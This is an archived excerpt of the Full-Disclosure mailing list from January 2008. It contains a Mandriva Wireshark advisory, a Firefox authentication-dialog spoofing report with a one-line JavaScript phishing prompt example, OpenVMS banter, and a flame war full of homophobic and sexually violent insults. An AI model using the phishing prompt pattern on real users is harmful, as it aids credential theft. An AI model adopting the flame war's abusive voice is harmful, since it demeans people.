In-Reply-To: <25233.1199302350@turing-police.cc.vt.edu>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
	<25233.1199302350@turing-police.cc.vt.edu>
Message-ID: <739e7bb20801021430u15f292c2q9a8e3dde17660769@mail.gmail.com>

On Jan 2, 2008 11:32 AM,  <Valdis.Kletnieks at vt.edu> wrote:
> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years.  Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..

VMS was a fine and elegant system, written in Bliss, Coral, and
Pascal. Yes, indeed, my children. Pascal. Much of the C code currently
in OpenVMS replaces the Coral and Pascal. The Bliss is still about the
same ratio. Mmmm, Bliss32. Good memories, thanks.

-- 
It's Full Disclosure.
Post the disclosure here, not on your website.
You may not have a web site tomorrow.



From security at mandriva.com  Wed Jan  2 23:30:28 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 02 Jan 2008 16:30:28 -0700
Subject: [Full-disclosure] [ MDVSA-2008:1 ] - Updated wireshark packages fix
 multiple vulnerabilities
Message-ID: <E1JAD2a-0006S3-53@artemis.annvix.ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                           MDVSA-2008:1
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : wireshark
 Date    : January 2, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of vulnerabilities in the Wireshark program were found that
 could cause crashes, excessive looping, or arbitrary code execution.
 
 This update rovides Wireshark 0.99.7 which is not vulnerable to
 these issues.
 
 An updated version of libsmi is also being provided, not because
 of security issues, but because this version of wireshark uses it
 instead of net-snmp for SNMP support.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6111
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6112
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6113
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6114
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6115
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6116
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6117
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6118
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6119
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6120
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6121
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6438
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6439
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6441
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6450
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6451
 http://www.wireshark.org/security/wnpa-sec-2007-03.html
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 3b8e9077915d6d2b26334de8d2f845fe  2007.0/i586/libsmi-mibs-ext-0.4.5-2.2mdv2007.0.i586.rpm
 dbe6a64db1d2fccb573a3e3f67f973f8  2007.0/i586/libsmi-mibs-std-0.4.5-2.2mdv2007.0.i586.rpm
 87d655b543be31d5ae0f58a8dbf97027  2007.0/i586/libsmi2-0.4.5-2.2mdv2007.0.i586.rpm
 4ff75e902911eb3ff3fdf307220ca62d  2007.0/i586/libsmi2-devel-0.4.5-2.2mdv2007.0.i586.rpm
 49765d2627d5d361fea25034a7cffdb3  2007.0/i586/libwireshark0-0.99.7-0.1mdv2007.0.i586.rpm
 0a01841128e59b2f7d176294017c6763  2007.0/i586/smi-tools-0.4.5-2.2mdv2007.0.i586.rpm
 8aa19bb4d1e9117ca49513cc59029796  2007.0/i586/tshark-0.99.7-0.1mdv2007.0.i586.rpm
 3bc0b4bab65defa5bf6e35759031fcb7  2007.0/i586/wireshark-0.99.7-0.1mdv2007.0.i586.rpm
 c0c54d8444367c6183c62cece8cac049  2007.0/i586/wireshark-tools-0.99.7-0.1mdv2007.0.i586.rpm 
 7968c27be369f6b1f420fa24a4a515a1  2007.0/SRPMS/libsmi-0.4.5-2.2mdv2007.0.src.rpm
 93d4485e496435ada84767d57f7c1225  2007.0/SRPMS/wireshark-0.99.7-0.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 5f6ce5ab3aec1f5127103b072bd119f8  2007.0/x86_64/lib64smi2-0.4.5-2.2mdv2007.0.x86_64.rpm
 be3c430ecada008c60cf35e286825708  2007.0/x86_64/lib64smi2-devel-0.4.5-2.2mdv2007.0.x86_64.rpm
 c6fe3c1044e2dd49e6ba317ccb894584  2007.0/x86_64/lib64wireshark0-0.99.7-0.1mdv2007.0.x86_64.rpm
 9d8536864c09ad40dd4224fa3b0d574d  2007.0/x86_64/libsmi-mibs-ext-0.4.5-2.2mdv2007.0.x86_64.rpm
 6f038a40025193ca8051b0460fb7caa5  2007.0/x86_64/libsmi-mibs-std-0.4.5-2.2mdv2007.0.x86_64.rpm
 68369d61905e99fe3ccaf53f5e57bc8e  2007.0/x86_64/smi-tools-0.4.5-2.2mdv2007.0.x86_64.rpm
 c26ac8fc5775cd607c661690329ab1e1  2007.0/x86_64/tshark-0.99.7-0.1mdv2007.0.x86_64.rpm
 d459878bb96b1876b5bd6bb474e4a7ce  2007.0/x86_64/wireshark-0.99.7-0.1mdv2007.0.x86_64.rpm
 0f8cb96e05b83022fb31444bc01e08c3  2007.0/x86_64/wireshark-tools-0.99.7-0.1mdv2007.0.x86_64.rpm 
 7968c27be369f6b1f420fa24a4a515a1  2007.0/SRPMS/libsmi-0.4.5-2.2mdv2007.0.src.rpm
 93d4485e496435ada84767d57f7c1225  2007.0/SRPMS/wireshark-0.99.7-0.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 d4f8fcfde7e4a5f547282829163a6838  2007.1/i586/libsmi-mibs-ext-0.4.5-2.2mdv2007.1.i586.rpm
 be6c823a10d7dd7ea3b23da1606e30a7  2007.1/i586/libsmi-mibs-std-0.4.5-2.2mdv2007.1.i586.rpm
 ae2f88e691ebb0b376a136fa2f7a5949  2007.1/i586/libsmi2-0.4.5-2.2mdv2007.1.i586.rpm
 245b8d9a9b8f85437f8c4aebb81479c6  2007.1/i586/libsmi2-devel-0.4.5-2.2mdv2007.1.i586.rpm
 8fe776c3019f672043e5346fd4462995  2007.1/i586/libwireshark0-0.99.7-0.1mdv2007.1.i586.rpm
 42fb7f4c0baaed536c933adc1e4cb07c  2007.1/i586/smi-tools-0.4.5-2.2mdv2007.1.i586.rpm
 1fefa448daf9412b9475a1fcb908ddc4  2007.1/i586/tshark-0.99.7-0.1mdv2007.1.i586.rpm
 6df4f1564d1d20087b87ad12c2afc7d8  2007.1/i586/wireshark-0.99.7-0.1mdv2007.1.i586.rpm
 18263c6e83de541e5c241ee90e6c07d7  2007.1/i586/wireshark-tools-0.99.7-0.1mdv2007.1.i586.rpm 
 db3984a957602d0d4d92b3afb3a99d4e  2007.1/SRPMS/libsmi-0.4.5-2.2mdv2007.1.src.rpm
 ff37f6fc51d9f1fceb55e7cc993e7de5  2007.1/SRPMS/wireshark-0.99.7-0.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 33c0feb8826a285b520ec5779e94b193  2007.1/x86_64/lib64smi2-0.4.5-2.2mdv2007.1.x86_64.rpm
 27af7f9e7aa57ae63b4afc44c7cf5509  2007.1/x86_64/lib64smi2-devel-0.4.5-2.2mdv2007.1.x86_64.rpm
 49b666ff593a860f1930f66d1ce4defe  2007.1/x86_64/lib64wireshark0-0.99.7-0.1mdv2007.1.x86_64.rpm
 aee09168343a531052b148ee2b8cb612  2007.1/x86_64/libsmi-mibs-ext-0.4.5-2.2mdv2007.1.x86_64.rpm
 de9f9609eb2b1fa492179af10a4ae48b  2007.1/x86_64/libsmi-mibs-std-0.4.5-2.2mdv2007.1.x86_64.rpm
 d8e3b591abae976a1a0171824a36c906  2007.1/x86_64/smi-tools-0.4.5-2.2mdv2007.1.x86_64.rpm
 a26a60457e667e0bf28911bd17f9031f  2007.1/x86_64/tshark-0.99.7-0.1mdv2007.1.x86_64.rpm
 55a41bf37f237a77b6d700521222865a  2007.1/x86_64/wireshark-0.99.7-0.1mdv2007.1.x86_64.rpm
 1253938c2b8b83846fbcba775d1abfb6  2007.1/x86_64/wireshark-tools-0.99.7-0.1mdv2007.1.x86_64.rpm 
 db3984a957602d0d4d92b3afb3a99d4e  2007.1/SRPMS/libsmi-0.4.5-2.2mdv2007.1.src.rpm
 ff37f6fc51d9f1fceb55e7cc993e7de5  2007.1/SRPMS/wireshark-0.99.7-0.1mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 8ddec7918618ad0c05681c9e868d5749  2008.0/i586/libsmi-devel-0.4.5-2.1mdv2008.0.i586.rpm
 515291f1ea87bc98886232c88d8e77ac  2008.0/i586/libsmi-mibs-ext-0.4.5-2.1mdv2008.0.i586.rpm
 428ca0dd4c11b4a52e9b8b55c1226889  2008.0/i586/libsmi-mibs-std-0.4.5-2.1mdv2008.0.i586.rpm
 78d313e34cd392ad925c497d77703bd1  2008.0/i586/libsmi2-0.4.5-2.1mdv2008.0.i586.rpm
 e9d9a6560a9f35a325c45142c20d73a7  2008.0/i586/libwireshark-devel-0.99.7-0.1mdv2008.0.i586.rpm
 8cd27aef2b1d9a74125aa09a0fd67c62  2008.0/i586/libwireshark0-0.99.7-0.1mdv2008.0.i586.rpm
 03ec7ad86e36e72f5726ef3e61d0c966  2008.0/i586/smi-tools-0.4.5-2.1mdv2008.0.i586.rpm
 ddb7b8990649bc5dfb924ab138b5f166  2008.0/i586/tshark-0.99.7-0.1mdv2008.0.i586.rpm
 acd81887f0c6d376c5c27c25bd9ce573  2008.0/i586/wireshark-0.99.7-0.1mdv2008.0.i586.rpm
 42d89dc7de0b0d95de0b145348fbe434  2008.0/i586/wireshark-tools-0.99.7-0.1mdv2008.0.i586.rpm 
 1f6549a3de8de269542ed3136059de7d  2008.0/SRPMS/libsmi-0.4.5-2.1mdv2008.0.src.rpm
 7d2618f7919055f24c6a5a0a642c012c  2008.0/SRPMS/wireshark-0.99.7-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 422f39bcba64fdc3034d8ae4107d0c83  2008.0/x86_64/lib64smi-devel-0.4.5-2.1mdv2008.0.x86_64.rpm
 82cee9a6f246a30e3981639ad559ac99  2008.0/x86_64/lib64smi2-0.4.5-2.1mdv2008.0.x86_64.rpm
 e2750893002c9f30573bf9f13e208a24  2008.0/x86_64/lib64wireshark-devel-0.99.7-0.1mdv2008.0.x86_64.rpm
 053969419e2af559526b382f891d5b5e  2008.0/x86_64/lib64wireshark0-0.99.7-0.1mdv2008.0.x86_64.rpm
 9e52ac6e6da6ee73a9e5ee9713b93eac  2008.0/x86_64/libsmi-mibs-ext-0.4.5-2.1mdv2008.0.x86_64.rpm
 56dda40a8b674d50338c09895d5b0edb  2008.0/x86_64/libsmi-mibs-std-0.4.5-2.1mdv2008.0.x86_64.rpm
 d12810fb24e625beff6000b0eb11319f  2008.0/x86_64/smi-tools-0.4.5-2.1mdv2008.0.x86_64.rpm
 2a4d7a7174e29b939f7328b6c42b0cbe  2008.0/x86_64/tshark-0.99.7-0.1mdv2008.0.x86_64.rpm
 d9f0965ee9bd47c2a7e29d2adb7632ce  2008.0/x86_64/wireshark-0.99.7-0.1mdv2008.0.x86_64.rpm
 7045d748d1bff2cc6372efcc1fa8eee9  2008.0/x86_64/wireshark-tools-0.99.7-0.1mdv2008.0.x86_64.rpm 
 1f6549a3de8de269542ed3136059de7d  2008.0/SRPMS/libsmi-0.4.5-2.1mdv2008.0.src.rpm
 7d2618f7919055f24c6a5a0a642c012c  2008.0/SRPMS/wireshark-0.99.7-0.1mdv2008.0.src.rpm

 Corporate 4.0:
 3105c7480d1466787bab5c202a24c881  corporate/4.0/i586/libsmi-mibs-ext-0.4.5-2.2.20060mlcs4.i586.rpm
 6b1f79d9dcfede50a77833d7e27b2207  corporate/4.0/i586/libsmi-mibs-std-0.4.5-2.2.20060mlcs4.i586.rpm
 3a022e89d08142476e1dd697da40aefd  corporate/4.0/i586/libsmi2-0.4.5-2.2.20060mlcs4.i586.rpm
 ce253c3fd84efb95e9f80d91d2047ba3  corporate/4.0/i586/libsmi2-devel-0.4.5-2.2.20060mlcs4.i586.rpm
 cb1558626b02c7ac7a60f2470e22406f  corporate/4.0/i586/libwireshark0-0.99.7-0.1.20060mlcs4.i586.rpm
 ba73ddd29044d4d93cec49dcd737efae  corporate/4.0/i586/smi-tools-0.4.5-2.2.20060mlcs4.i586.rpm
 16fde2392ce2adf31a992010cbec390f  corporate/4.0/i586/tshark-0.99.7-0.1.20060mlcs4.i586.rpm
 f9eca8f2b302d3dbb8d7379d4038e910  corporate/4.0/i586/wireshark-0.99.7-0.1.20060mlcs4.i586.rpm
 71fe25c9a1bd3b9bdb0339c51aa9463c  corporate/4.0/i586/wireshark-tools-0.99.7-0.1.20060mlcs4.i586.rpm 
 a050e420402960d4ff2608487326bc31  corporate/4.0/SRPMS/libsmi-0.4.5-2.2.20060mlcs4.src.rpm
 5cce91e2cb4c0e330b7280131870640f  corporate/4.0/SRPMS/wireshark-0.99.7-0.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 22ae3adf154cd430b91c1883344df21d  corporate/4.0/x86_64/lib64smi2-0.4.5-2.2.20060mlcs4.x86_64.rpm
 fa4f2e5e8a8f4b055ba34ea3d6c33224  corporate/4.0/x86_64/lib64smi2-devel-0.4.5-2.2.20060mlcs4.x86_64.rpm
 1601e097303a14f2b9c36d13b6d8e785  corporate/4.0/x86_64/lib64wireshark0-0.99.7-0.1.20060mlcs4.x86_64.rpm
 c682b4bb19a9161ffe0d4520a091815e  corporate/4.0/x86_64/libsmi-mibs-ext-0.4.5-2.2.20060mlcs4.x86_64.rpm
 7605b1a4a0c911e4de3c5658e87bd2fd  corporate/4.0/x86_64/libsmi-mibs-std-0.4.5-2.2.20060mlcs4.x86_64.rpm
 1ffe2793d1ec3747e503caa0ae38faed  corporate/4.0/x86_64/smi-tools-0.4.5-2.2.20060mlcs4.x86_64.rpm
 6e405520c32127950447cf43c3399bf7  corporate/4.0/x86_64/tshark-0.99.7-0.1.20060mlcs4.x86_64.rpm
 3d5691445aabafc9b1871c0f46df4cb0  corporate/4.0/x86_64/wireshark-0.99.7-0.1.20060mlcs4.x86_64.rpm
 9509f638dbab7c4e5a89f356db1d49fc  corporate/4.0/x86_64/wireshark-tools-0.99.7-0.1.20060mlcs4.x86_64.rpm 
 a050e420402960d4ff2608487326bc31  corporate/4.0/SRPMS/libsmi-0.4.5-2.2.20060mlcs4.src.rpm
 5cce91e2cb4c0e330b7280131870640f  corporate/4.0/SRPMS/wireshark-0.99.7-0.1.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iEYEARECAAYFAkd784IACgkQmqjQ0CJFipj6/wCeLFypfxZdEJROyKUw9KfwAflZ
feIAoJa2hM9XvT54eiCPdYwhA9KURMIy
=4Y2q
-----END PGP SIGNATURE-----



From reepex at gmail.com  Wed Jan  2 23:41:03 2008
From: reepex at gmail.com (reepex)
Date: Wed, 2 Jan 2008 17:41:03 -0600
Subject: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
In-Reply-To: <20080102164630.F3980118039@mailserver5.hushmail.com>
References: <20080102164630.F3980118039@mailserver5.hushmail.com>
Message-ID: <e9d9d4020801021541v5ceaf4eeta2ad882a12cd08bb@mail.gmail.com>

So you included me in here because my name has something to do with farm
equipment? Did your message have a point?

You wrote a bunch of nonsense flattering your favorite security stars and
then attempted to flame us with one liners that did not make sense.. It
seems you are caught in between the serious posters ( since you have no
skill, you cannot post anything useful), and the trolls ( because you are
not funny or convincing ).

My version of full disclosure is calling out idiots with Cissps and Phds who
post here and think their XSS and earth shattering barragess of 0x41's makes
them security experts.

On Jan 2, 2008 10:46 AM, <31415926 at hush.ai> wrote:

> Critical Vulnerability in [Full-Disclosure]
>
> The problem with full disclosure is that everyone feels the need to
> fully disclose, even when their opinion and the information they
> are purporting to impart is, well, bollocks. You can't tell them to
> shut up as they think they're important and the internet gives them
> balls of steel and verbal diarhoea, so we stumble from one tired
> flamewar to another with no useful content being published.
>
> It's embarrassing.
>
> I'm an advocate of FD as a concept. I believe that there is no such
> thing as an innocent on the internet and if you really are that
> dumb, then you deserve everything you get. FD (as one of many like-
> minded lists) forces the vendors to patch or die and eventually
> write quality code. FD (the concept, not the list) is the ultimate
> nuclear deterrent, without the mutually assured destruction lunacy.
>
> I have watched the posters to this list for some time. By far the
> vast majority are transparently kiddies, sitting on their painted-
> up laptops thinking of themselves as the techno-brats in the film
> "Hackers" and hoping to grow up to be like the guy in the film
> "Swordfish". They write in l33t5p34k and think that this somehow
> makes them informed. Kiddies are the lowest form of life in the
> hierarchy of information security and in the IT industry generally.
>
> You know who you are and so does everyone else. You are fools, and
> an embarrassment to the craft:
> Secreview (review of products/services you have never bought, are
> you the goatse.cz receiver?)
> Reepex (Isn't a reepex a bit of farm machinery?)
> Gobbles (A nickname for a gay male prostitute)
> Morning Wood (The holy grail of the viagra-abuser)
> Gmaggro ("high value target selection", are you completely cocking
> stupid?)
>
> Oh, the outrage.
>
> I can see it now. there will be armies of skiddies demanding that
> the l33tz hack this f at cker, spam him, pwn him, and post defamatory
> messages concerning her skills and possible employment
> opportunities for her and her mother everywhere possible. Guess
> what, kids? I don't care.
>
> No, not even a little bit. Do what you like, I could care less and
> no one else cares if you live or die tonight, you sad, acne'd
> little dewdrops.
>
> Calmed down yet?
>
> Good. I want you to consider something.
>
> The FD list consists of the following content (and what it has to
> say):
>
> Advisories by vendors (we fixed this)
> Advisories by individuals (I tested that and found this)
> Advisories by infosec organisations (we found this)
> Funnies (self explanatory)
> Opinions (this sucks, what about that?)
> Skids (I did this, aren't I great, everyone else sucks?)
> Trolls (you suck)
> Trawlers (I have something 0day to buy or sell)
>
> The top three (ie the useful content) is available in any one of a
> hundred places, the bottom three are noise. The only people
> interested in the noise are those who keep track of it for a
> living.
>
> So, consider that by posting anything in the bottom three
> categories, you are drawing the attention of those who take an
> interest in your sad efforts to destabilise the technical crutch of
> society. These people are better than you in every important way,
> and if you so much as tiptoe across one of their lines, you'll wind
> up sharing a cell with a 7ft gorilla called george with a dead
> mouse and a pressing need to dry-cornhole your ringpiece 3 times a
> night and twice on sundays. Do yourselves a favour and STFU.
>
> What's left?
>
> The funnies and the opinions. I've laughed my tits off at posts by
> Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and i've
> been interested by a few others who will remain nameless as I can't
> list them all. Long live full disclosure, but keep in mind that
> you're only legends in your own bedrooms.
>
> later, pi
>
> --
> Click to get a free auto insurance quotes from top companies.
>
> http://tagline.hushmail.com/fc/Ioyw6h4d8EIl5uJlSoB5C7HKVmuBsQOXlKB8YUus2MT2FpMkQCNmCM/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/559937f3/attachment.html 

From mailinglistsspam at gmail.com  Thu Jan  3 00:24:04 2008
From: mailinglistsspam at gmail.com (list spam)
Date: Thu, 3 Jan 2008 11:24:04 +1100
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <5e9ff4240801021615m4ef23594l7826e850caa69f2@mail.gmail.com>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
	<25233.1199302350@turing-police.cc.vt.edu>
	<5e9ff4240801021615m4ef23594l7826e850caa69f2@mail.gmail.com>
Message-ID: <5e9ff4240801021624y18b4ea17xca10d6d96b063c8c@mail.gmail.com>

          W O R M S    A G A I N S T    N U C L E A R    K I L L E R S
         _______________________________________________________________
         \__  ____________  _____    ________    ____  ____   __  _____/
          \ \ \    /\    / /    / /\ \       | \ \  | |    | | / /    /
           \ \ \  /  \  / /    / /__\ \      | |\ \ | |    | |/ /    /
            \ \ \/ /\ \/ /    / ______ \     | | \ \| |    | |\ \   /
             \_\  /__\  /____/ /______\ \____| |__\ | |____| |_\ \_/
              \___________________________________________________/
               \                                                 /
                \    Your System Has Been Officically WANKed    /
                 \_____________________________________________/



On Jan 3, 2008 6:32 AM, <Valdis.Kletnieks at vt.edu> wrote:

> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years.  Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
>
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..
>
> > Security relevance: UNHACKABLE! <grin>
>
> WANK! (The old-timers will know what that means, and it's not what you
> newbies
> think... ;)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080103/b067b536/attachment.html 

From redhowlingwolves at bellsouth.net  Thu Jan  3 03:55:15 2008
From: redhowlingwolves at bellsouth.net (scott)
Date: Wed, 02 Jan 2008 22:55:15 -0500
Subject: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
In-Reply-To: <e9d9d4020801021541v5ceaf4eeta2ad882a12cd08bb@mail.gmail.com>
References: <20080102164630.F3980118039@mailserver5.hushmail.com>
	<e9d9d4020801021541v5ceaf4eeta2ad882a12cd08bb@mail.gmail.com>
Message-ID: <477C5CA3.7020508@bellsouth.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

An your earth-shattering views are *SO* important,you must make sure
everyone hears you.I think you just like to see your own posts.

I'm filtering your posts from now on as they are nothing but from a
wanna-be trying to play kids games in a mans world.

I shouldn't waste my time responding to a teeny- bopper,anyway.

Scott
reepex wrote:
> So you included me in here because my name has something to do with farm
> equipment? Did your message have a point?
>
> You wrote a bunch of nonsense flattering your favorite security stars and
> then attempted to flame us with one liners that did not make sense.. It
> seems you are caught in between the serious posters ( since you have no
> skill, you cannot post anything useful), and the trolls ( because you are
> not funny or convincing ).
>
> My version of full disclosure is calling out idiots with Cissps and
Phds who
> post here and think their XSS and earth shattering barragess of 0x41's
makes
> them security experts.
>
> On Jan 2, 2008 10:46 AM, <31415926 at hush.ai> wrote:
>
>> Critical Vulnerability in [Full-Disclosure]
>>
>> The problem with full disclosure is that everyone feels the need to
>> fully disclose, even when their opinion and the information they
>> are purporting to impart is, well, bollocks. You can't tell them to
>> shut up as they think they're important and the internet gives them
>> balls of steel and verbal diarhoea, so we stumble from one tired
>> flamewar to another with no useful content being published.
>>
>> It's embarrassing.
>>
>> I'm an advocate of FD as a concept. I believe that there is no such
>> thing as an innocent on the internet and if you really are that
>> dumb, then you deserve everything you get. FD (as one of many like-
>> minded lists) forces the vendors to patch or die and eventually
>> write quality code. FD (the concept, not the list) is the ultimate
>> nuclear deterrent, without the mutually assured destruction lunacy.
>>
>> I have watched the posters to this list for some time. By far the
>> vast majority are transparently kiddies, sitting on their painted-
>> up laptops thinking of themselves as the techno-brats in the film
>> "Hackers" and hoping to grow up to be like the guy in the film
>> "Swordfish". They write in l33t5p34k and think that this somehow
>> makes them informed. Kiddies are the lowest form of life in the
>> hierarchy of information security and in the IT industry generally.
>>
>> You know who you are and so does everyone else. You are fools, and
>> an embarrassment to the craft:
>> Secreview (review of products/services you have never bought, are
>> you the goatse.cz receiver?)
>> Reepex (Isn't a reepex a bit of farm machinery?)
>> Gobbles (A nickname for a gay male prostitute)
>> Morning Wood (The holy grail of the viagra-abuser)
>> Gmaggro ("high value target selection", are you completely cocking
>> stupid?)
>>
>> Oh, the outrage.
>>
>> I can see it now. there will be armies of skiddies demanding that
>> the l33tz hack this f at cker, spam him, pwn him, and post defamatory
>> messages concerning her skills and possible employment
>> opportunities for her and her mother everywhere possible. Guess
>> what, kids? I don't care.
>>
>> No, not even a little bit. Do what you like, I could care less and
>> no one else cares if you live or die tonight, you sad, acne'd
>> little dewdrops.
>>
>> Calmed down yet?
>>
>> Good. I want you to consider something.
>>
>> The FD list consists of the following content (and what it has to
>> say):
>>
>> Advisories by vendors (we fixed this)
>> Advisories by individuals (I tested that and found this)
>> Advisories by infosec organisations (we found this)
>> Funnies (self explanatory)
>> Opinions (this sucks, what about that?)
>> Skids (I did this, aren't I great, everyone else sucks?)
>> Trolls (you suck)
>> Trawlers (I have something 0day to buy or sell)
>>
>> The top three (ie the useful content) is available in any one of a
>> hundred places, the bottom three are noise. The only people
>> interested in the noise are those who keep track of it for a
>> living.
>>
>> So, consider that by posting anything in the bottom three
>> categories, you are drawing the attention of those who take an
>> interest in your sad efforts to destabilise the technical crutch of
>> society. These people are better than you in every important way,
>> and if you so much as tiptoe across one of their lines, you'll wind
>> up sharing a cell with a 7ft gorilla called george with a dead
>> mouse and a pressing need to dry-cornhole your ringpiece 3 times a
>> night and twice on sundays. Do yourselves a favour and STFU.
>>
>> What's left?
>>
>> The funnies and the opinions. I've laughed my tits off at posts by
>> Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and i've
>> been interested by a few others who will remain nameless as I can't
>> list them all. Long live full disclosure, but keep in mind that
>> you're only legends in your own bedrooms.
>>
>> later, pi
>>
>> --
>> Click to get a free auto insurance quotes from top companies.
>>
>>
http://tagline.hushmail.com/fc/Ioyw6h4d8EIl5uJlSoB5C7HKVmuBsQOXlKB8YUus2MT2FpMkQCNmCM/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ----------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


- --
<b>redhowlingwolves</b>
<br>Web:<a href=http://www.hacking-passion.com/>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHfFyhxajqy/aNaRsRAnrxAJ9HdTwy+i8X6+L/9Ol5UkqmKpl1kwCeI9N2
XqT/0tOM1wkEmvVrYlL+yCE=
=fasY
-----END PGP SIGNATURE-----



From avivra at gmail.com  Thu Jan  3 06:12:06 2008
From: avivra at gmail.com (avivra)
Date: Thu, 3 Jan 2008 08:12:06 +0200
Subject: [Full-disclosure] Yet another Dialog Spoofing Vulnerability -
	Firefox Basic Authentication
Message-ID: <001601c84dcf$92085dd0$b6191970$@com>

Summary
Mozilla Firefox allows spoofing the information presented in the basic
authentication dialog box. This can allow an attacker to conduct phishing
attacks, by tricking the user to believe that the authentication dialog box
is from a trusted website.

Affected versions
Mozilla Firefox v2.0.0.11. 
Prior versions and other Mozilla products may also be affected.

http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthen
tication.aspx




From lcamtuf at dione.cc  Thu Jan  3 10:48:21 2008
From: lcamtuf at dione.cc (Michal Zalewski)
Date: Thu, 3 Jan 2008 11:48:21 +0100 (CET)
Subject: [Full-disclosure] Yet another Dialog Spoofing Vulnerability -
 Firefox Basic Authentication
In-Reply-To: <001601c84dcf$92085dd0$b6191970$@com>
References: <001601c84dcf$92085dd0$b6191970$@com>
Message-ID: <Pine.LNX.4.64.0801031115480.12557@dione.cc>

On Thu, 3 Jan 2008, avivra wrote:

> http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx

Although it's amusing Firefox filters '"' in this prompt to begin with, 
rather than designing it more wisely not to render attacker-controlled 
text inline (use a table view below instead!), I'm not sure that the 
ability to use single quotes (or other homoglyphs) makes the attack 
considerably more dangerous.

Note that any person familiar with the dialog is unlikely to be confused 
by this prompt, as a clear indication of the originating site, consistent 
with the design of this dialog, is preserved ("...at 
http://avivraff.com"). As such, I would certainly not go as far as 
recommending "not to provide username and password to web sites which show 
this dialog" - that's an overkill. Just don't trust self-contradictory or 
unusually structured dialogs - you never should.

Naturally, any person *not* used to seeing this dialog might be eager to 
enter his credentials there, lulled by the tech lingo - but that's a 
general complaint about browser design that is in no way specific to 
Firefox; the same person would be likely to give out his password to:

   prompt("Please enter your password for foocorp.com (certified by Verisign)")'.

...simply because a systemic failure of browser vendors to provide 
user-friendly security signaling and UI behavior (along the lines of: "as 
far as we're concerned, any person with no understanding of SSL, HTTP, and 
